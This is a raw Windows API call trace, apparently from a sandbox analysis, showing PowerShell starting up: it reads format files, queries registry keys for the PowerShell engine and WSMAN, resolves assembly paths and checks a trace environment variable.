	[0478.431] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x23e2bdd4, Data2=0x521f, Data3=0x4019, Data4=([0]=0x8c, [1]=0x77, [2]=0xc0, [3]=0xae, [4]=0xd, [5]=0xd2, [6]=0x10, [7]=0xb0))) returned 0x0
	[0478.431] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x84891d07, Data2=0x7e5b, Data3=0x47b9, Data4=([0]=0xa3, [1]=0x72, [2]=0x3e, [3]=0x4e, [4]=0x83, [5]=0x11, [6]=0x8c, [7]=0x27))) returned 0x0
	[0478.431] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x2ba9ca14, Data2=0xae4d, Data3=0x4663, Data4=([0]=0x9d, [1]=0x58, [2]=0xd6, [3]=0x34, [4]=0xf5, [5]=0xb9, [6]=0xe8, [7]=0xa))) returned 0x0
	[0478.432] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x7470789a, Data2=0x6c16, Data3=0x47b5, Data4=([0]=0x82, [1]=0x74, [2]=0xda, [3]=0xa5, [4]=0xae, [5]=0x22, [6]=0xb5, [7]=0xc8))) returned 0x0
	[0478.432] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xb579a929, Data2=0x85e4, Data3=0x4372, Data4=([0]=0x8a, [1]=0x1d, [2]=0x34, [3]=0xb6, [4]=0x14, [5]=0x51, [6]=0xc, [7]=0xfa))) returned 0x0
	[0478.432] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x51ce773b, Data2=0x176f, Data3=0x4fe0, Data4=([0]=0x84, [1]=0x61, [2]=0xaf, [3]=0xf8, [4]=0x51, [5]=0xf6, [6]=0xc8, [7]=0xb3))) returned 0x0
	[0478.433] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xb7063128, Data2=0xe64, Data3=0x42c3, Data4=([0]=0x86, [1]=0xb6, [2]=0xaf, [3]=0xd4, [4]=0xcc, [5]=0xd2, [6]=0x36, [7]=0xcb))) returned 0x0
	[0478.433] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x63465644, Data2=0xfd81, Data3=0x4358, Data4=([0]=0xb1, [1]=0x1e, [2]=0xc1, [3]=0x5d, [4]=0x88, [5]=0x17, [6]=0xdf, [7]=0x8))) returned 0x0
	[0478.433] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x64fb2f19, Data2=0xa900, Data3=0x42d2, Data4=([0]=0xbb, [1]=0xf8, [2]=0x3f, [3]=0x97, [4]=0xda, [5]=0x9f, [6]=0x8f, [7]=0x1e))) returned 0x0
	[0478.433] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xc5f8bd0b, Data2=0xb022, Data3=0x4247, Data4=([0]=0x8b, [1]=0xe8, [2]=0xf2, [3]=0x6c, [4]=0xee, [5]=0x66, [6]=0x45, [7]=0x26))) returned 0x0
	[0478.433] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x4a6ee9a5, Data2=0x7f46, Data3=0x4d98, Data4=([0]=0x95, [1]=0xae, [2]=0x4f, [3]=0x2, [4]=0xd1, [5]=0x10, [6]=0x5c, [7]=0x11))) returned 0x0
	[0478.433] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xb2b33bd2, Data2=0x5f6f, Data3=0x40f1, Data4=([0]=0x8b, [1]=0x82, [2]=0x12, [3]=0xda, [4]=0x46, [5]=0x79, [6]=0xff, [7]=0x15))) returned 0x0
	[0478.434] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf0b21597, Data2=0xcc18, Data3=0x4fce, Data4=([0]=0xb6, [1]=0xa8, [2]=0xf7, [3]=0x90, [4]=0x3e, [5]=0x8f, [6]=0xf7, [7]=0xf))) returned 0x0
	[0478.434] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x446a4faa, Data2=0xc6dd, Data3=0x429c, Data4=([0]=0x8e, [1]=0xb, [2]=0xee, [3]=0xf3, [4]=0xb9, [5]=0x37, [6]=0x6a, [7]=0xde))) returned 0x0
	[0478.434] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xbb37fd92, Data2=0x32e, Data3=0x45db, Data4=([0]=0xa7, [1]=0x18, [2]=0xc, [3]=0x9c, [4]=0x1a, [5]=0x27, [6]=0x50, [7]=0x4))) returned 0x0
	[0478.434] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x9a744ef0, Data2=0x9d56, Data3=0x4dba, Data4=([0]=0x88, [1]=0xfe, [2]=0x40, [3]=0x8d, [4]=0x8, [5]=0xbe, [6]=0x9a, [7]=0x2f))) returned 0x0
	[0478.434] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x32b04eb2, Data2=0xb1f1, Data3=0x4c8e, Data4=([0]=0xab, [1]=0xcb, [2]=0xd3, [3]=0xfd, [4]=0xe, [5]=0x2e, [6]=0xf2, [7]=0xd1))) returned 0x0
	[0478.434] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x5dec7652, Data2=0xa877, Data3=0x4f47, Data4=([0]=0xb4, [1]=0x33, [2]=0xf3, [3]=0x7d, [4]=0x8f, [5]=0xe2, [6]=0x5b, [7]=0xc))) returned 0x0
	[0478.434] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0478.435] GetFileType (hFile=0x320) returned 0x1
	[0478.435] SetErrorMode (uMode=0x1) returned 0x1
	[0478.435] GetFileType (hFile=0x320) returned 0x1
	[0478.435] ReadFile (in: hFile=0x320, lpBuffer=0x329ba80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ba80*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.436] ReadFile (in: hFile=0x320, lpBuffer=0x329ba80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ba80*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.436] ReadFile (in: hFile=0x320, lpBuffer=0x329ba80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ba80*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.436] ReadFile (in: hFile=0x320, lpBuffer=0x329ba80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ba80*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.436] ReadFile (in: hFile=0x320, lpBuffer=0x329ba80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ba80*, lpNumberOfBytesRead=0x1ed0d8*=0x8b4, lpOverlapped=0x0) returned 1
	[0478.437] ReadFile (in: hFile=0x320, lpBuffer=0x329ae9c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ae9c*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0478.437] ReadFile (in: hFile=0x320, lpBuffer=0x329ba80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x329ba80*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0478.437] CloseHandle (hObject=0x320) returned 1
	[0478.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0478.437] SetErrorMode (uMode=0x1) returned 0x1
	[0478.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0478.437] SetErrorMode (uMode=0x1) returned 0x1
	[0478.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0478.438] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x320) returned 0x0
	[0478.438] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0478.438] CoTaskMemAlloc (cb=0x5a) returned 0x4a6080
	[0478.438] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x4a6080, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0478.438] CoTaskMemFree (pv=0x4a6080) 
	[0478.438] RegCloseKey (hKey=0x320) returned 0x0
	[0478.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0478.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0478.439] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xdfd42bf6, Data2=0xa229, Data3=0x4872, Data4=([0]=0xa8, [1]=0x98, [2]=0x14, [3]=0x7f, [4]=0x41, [5]=0xa6, [6]=0x1, [7]=0x99))) returned 0x0
	[0478.439] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x588eb56a, Data2=0x1d3c, Data3=0x4068, Data4=([0]=0xad, [1]=0xab, [2]=0x2a, [3]=0x82, [4]=0x8c, [5]=0x3a, [6]=0xfa, [7]=0x21))) returned 0x0
	[0478.439] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0478.439] GetFileType (hFile=0x320) returned 0x1
	[0478.439] SetErrorMode (uMode=0x1) returned 0x1
	[0478.439] GetFileType (hFile=0x320) returned 0x1
	[0478.440] ReadFile (in: hFile=0x320, lpBuffer=0x32d9868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d9868*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.440] ReadFile (in: hFile=0x320, lpBuffer=0x32d9868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d9868*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.441] ReadFile (in: hFile=0x320, lpBuffer=0x32d9868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d9868*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.441] ReadFile (in: hFile=0x320, lpBuffer=0x32d9868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d9868*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0478.441] ReadFile (in: hFile=0x320, lpBuffer=0x32d9868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d9868*, lpNumberOfBytesRead=0x1ed0d8*=0xe98, lpOverlapped=0x0) returned 1
	[0478.441] ReadFile (in: hFile=0x320, lpBuffer=0x32d8e68, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d8e68*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0478.441] ReadFile (in: hFile=0x320, lpBuffer=0x32d9868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x32d9868*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0478.441] CloseHandle (hObject=0x320) returned 1
	[0478.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0478.442] SetErrorMode (uMode=0x1) returned 0x1
	[0478.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0478.442] SetErrorMode (uMode=0x1) returned 0x1
	[0478.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0478.442] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x320) returned 0x0
	[0478.442] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0478.442] CoTaskMemAlloc (cb=0x5a) returned 0x4a6080
	[0478.443] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x4a6080, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0478.443] CoTaskMemFree (pv=0x4a6080) 
	[0478.443] RegCloseKey (hKey=0x320) returned 0x0
	[0478.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0478.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0478.444] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xc2331082, Data2=0xf34f, Data3=0x46a0, Data4=([0]=0xa9, [1]=0xab, [2]=0x92, [3]=0xf9, [4]=0x7f, [5]=0xaa, [6]=0x3a, [7]=0x26))) returned 0x0
	[0478.444] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x69ed3c81, Data2=0x463b, Data3=0x4f12, Data4=([0]=0x81, [1]=0x23, [2]=0x96, [3]=0x5c, [4]=0x2b, [5]=0xe9, [6]=0x7f, [7]=0x95))) returned 0x0
	[0478.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0478.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0478.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0478.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0479.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0479.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0479.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0479.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0481.673] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0481.674] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.674] CoTaskMemFree (pv=0x484630) 
	[0481.678] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0481.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.680] CoTaskMemFree (pv=0x484630) 
	[0481.689] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0481.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.690] CoTaskMemFree (pv=0x484630) 
	[0481.699] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0481.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.699] CoTaskMemFree (pv=0x484630) 
	[0482.569] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0482.569] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.569] CoTaskMemFree (pv=0x484630) 
	[0482.577] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0482.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.577] CoTaskMemFree (pv=0x484630) 
	[0482.579] CoTaskMemAlloc (cb=0x104) returned 0x484630
	[0482.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.579] CoTaskMemFree (pv=0x484630) 
	[0482.596] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed378 | out: phkResult=0x1ed378*=0x320) returned 0x0
	[0482.599] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed27c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed278, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed27c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed278*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0482.599] CoTaskMemFree (pv=0x0) 
	[0482.600] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0482.600] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x43c750, lpcchValueName=0x1ed328, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ed328, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.601] CoTaskMemFree (pv=0x43c750) 
	[0482.601] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0482.601] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x43c750, lpcchValueName=0x1ed328, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ed328, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.601] CoTaskMemFree (pv=0x43c750) 
	[0482.601] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0482.601] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x43c750, lpcchValueName=0x1ed328, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ed328, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0482.601] CoTaskMemFree (pv=0x43c750) 
	[0482.601] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed30c, lpData=0x0, lpcbData=0x1ed308*=0x0 | out: lpType=0x1ed30c*=0x1, lpData=0x0, lpcbData=0x1ed308*=0x8) returned 0x0
	[0482.601] CoTaskMemAlloc (cb=0xc) returned 0x4a9d60
	[0482.602] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed2dc, lpData=0x4a9d60, lpcbData=0x1ed2d8*=0x8 | out: lpType=0x1ed2dc*=0x1, lpData="2.0", lpcbData=0x1ed2d8*=0x8) returned 0x0
	[0482.602] CoTaskMemFree (pv=0x4a9d60) 
	[0484.245] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2c8 | out: phkResult=0x1ed2c8*=0x2f8) returned 0x0
	[0484.245] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed1cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0484.245] CoTaskMemFree (pv=0x0) 
	[0484.245] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0484.245] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x43c750, lpcchValueName=0x1ed278, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ed278, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0484.245] CoTaskMemFree (pv=0x43c750) 
	[0484.245] CoTaskMemAlloc (cb=0x204) returned 0x43c750
